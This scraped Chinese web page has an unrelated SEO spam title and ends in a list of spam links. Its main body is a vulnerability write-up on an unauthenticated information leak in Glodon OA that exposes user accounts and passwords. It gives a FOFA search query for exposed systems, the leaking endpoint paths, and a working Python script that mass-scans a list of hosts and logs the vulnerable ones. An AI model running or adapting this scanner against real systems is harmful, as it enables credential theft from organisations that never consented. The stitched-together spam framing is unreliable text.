当前位置: 首页 > news >正文

软件下载站网站源码免费优化落实新十条措施

news 2025/9/18 17:22:22
软件下载站网站源码免费,优化落实新十条措施,手工艺品网站建设策划书,市场调研app软件漏洞描述 广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端云大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权&#xff0c…

漏洞描述

广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端+云+大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权,导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。

漏洞复现

FOFA

app="Glodon-企业管理产品"

POC

IP+/Org/service/Service.asmx查看所有用户
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS

查看账户密码

python脚本

import argparse  
import time  
import requests  
from urllib.parse import urlsplit  
import warnings  
from urllib3.exceptions import InsecureRequestWarning  color_red = '\033[91m'  
color_green = '\033[92m'  
color_blue = '\033[94m'  
color_reset = '\033[0m'  def get_url(file):  with open(file, 'r', encoding='utf-8') as f:  for url in f:  url = url.replace('\n', '')  if "http" not in url:  url = "http://" + url  parsed_url = urlsplit(url)  base_url = parsed_url.scheme + "://" + parsed_url.netloc  send_req(base_url)  def write_result(content):  with open("result.txt", "a", encoding="UTF-8") as f:  f.write('{}\n'.format(content))  warnings.filterwarnings("ignore", category=InsecureRequestWarning)  def send_req(url_check):  url = url_check + '/Org/service/Service.asmx/GetAllUsersXml'  header = {  "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",  'Connection': 'close'  }  try:  response = requests.get(url=url, headers=header, verify=False, timeout=3)  if response.status_code == 200 and "<?xml" in response.text and "UserId=" in response.text and "SUserId=" in response.text and "Code=" in response.text:  response = requests.get(url=url_check + '/Org/service/Service.asmx/GetUserXml4GEPS', headers=header, verify=False, timeout=3)  if response.status_code == 200:  result2 = f"{url_check}/Org/service/Service.asmx/GetUserXml4GEPS"  print(color_red + result2 + color_reset)  # Added color_reset to avoid colored text issues  write_result(result2)  time.sleep(1)  except Exception as e:  pass  if __name__ == '__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-f", "--file", help="URL地址文件")  args = parser.parse_args()  if args.file:  get_url(args.file)  else:  print("使用-f加url文件地址")

执行效果

http://www.yayakq.cn/news/229041/

相关文章:

  • 深圳哪个网站发布做网站公司注册一站式
  • tp5被黑做的网站全变成首页wordpress ip锁定插件
  • 建设展示型网站公司哪家好知名企业名字
  • 中英文企业网站源码网站备案在哪里备案
  • 与网站建设关系密切的知识点中信建设有限责任公司 电话
  • 哈尔滨公司网站建设网站开发微信登录流程
  • 网站内容填写wordpress打开install
  • 安贞街道网站建设fizz wordpress
  • 2021年手机能看的网站成都市微信网站建设报价
  • 电商网站制作成手机appwap网址是什么意思
  • 钱多网站东莞专业网站建设平台
  • 建设银行交学费网站3d 网站设计
  • 怎样做美瞳网站个人商城网站能备案吗
  • 网站虚拟主机里的内容强制删除wordpress添加分页
  • 网站网页设计平台洛可可公司设计的产品
  • 松江专业做网站公司给公司做网站多钱
  • wordpress中英文站点网站开发培训周末班
  • 搜狗官方网站WordPress个人知识库
  • 石家庄市住房建设局网站好一点的网站建设公司
  • 网站专题页是什么wordpress 微博分享 searchpic=
  • 跨境电商自己做网站引流网站投票活动怎么做
  • wordpress个人网站后台登陆沈阳企业黄页免费
  • 做购物网站用什么应用建网站做商城个体户资质可以
  • 宝安做网站公司企业管理网站建设
  • 深圳网站设计与制作公司化妆品网站建设推广方案
  • 上孩做网站常州网站制作公司排名
  • 勾线外包网站贵州网站制作公司
  • 怎样做网站的外链套餐网站
  • 建设营销网站多少钱番禺厂家关键词优化
  • 苏州优化网站排名wordpress主题文件路径